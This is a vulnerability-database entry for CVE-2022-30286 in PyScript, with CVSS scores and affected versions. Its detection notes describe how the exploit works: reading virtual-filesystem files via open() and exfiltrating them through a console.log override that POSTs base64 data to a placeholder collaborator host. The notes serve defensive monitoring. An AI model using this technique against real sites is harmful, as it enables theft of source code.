cbcvebase.
CVE-2022-30286
published 2022-05-09

CVE-2022-30286: pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.

PriorityP259high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
13.00%
95.8th percentile
pyscriptjs (aka PyScript Demonstrator) in PyScript through 2022-05-04 allows a remote user to read Python source code.

Affected

1 ranges
VendorProductVersion rangeFixed in
pyscriptpyscript<= 2022-05-04

Detection & IOCsextracted from sources · hover to see the quote

path/lib/python3.10/asyncio/tasks.py
  • Monitor for PyScript applications reading arbitrary local filesystem paths (e.g. /lib/python3.10/) via Python open() calls executed in the browser's Emscripten virtual memory (VMemory) — this is the core exploitation primitive for CVE-2022-30286.
  • Detect exfiltration of read file contents via a console.log override that base64-encodes captured output and POSTs it to an attacker-controlled endpoint — look for outbound POST requests with Content-Type: text/plain;charset=utf-8 and a JSON body containing a 'content' key with base64 data originating from a PyScript page.
  • Flag PyScript pages (those loading pyscript.js or containing <py-script> tags) where inline script overrides console.log to intercept and exfiltrate printed output — this is the attacker's data-theft mechanism for source code read via CVE-2022-30286.
  • ·The exploit targets PyScript version 2022-05-04-Alpha specifically; later versions may not expose the same Emscripten VMemory filesystem paths to arbitrary open() calls.
  • ·The exploit was tested on an Ubuntu Apache Server environment; the accessible VMemory paths (e.g. /lib/python3.10/) are Emscripten virtual paths and may differ across deployment configurations.
  • ·The exfiltration URL in the PoC is a placeholder (YOURburpcollaborator.net); in real attacks this will be replaced with an attacker-controlled OOB collection endpoint — detections should not rely on this specific domain.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.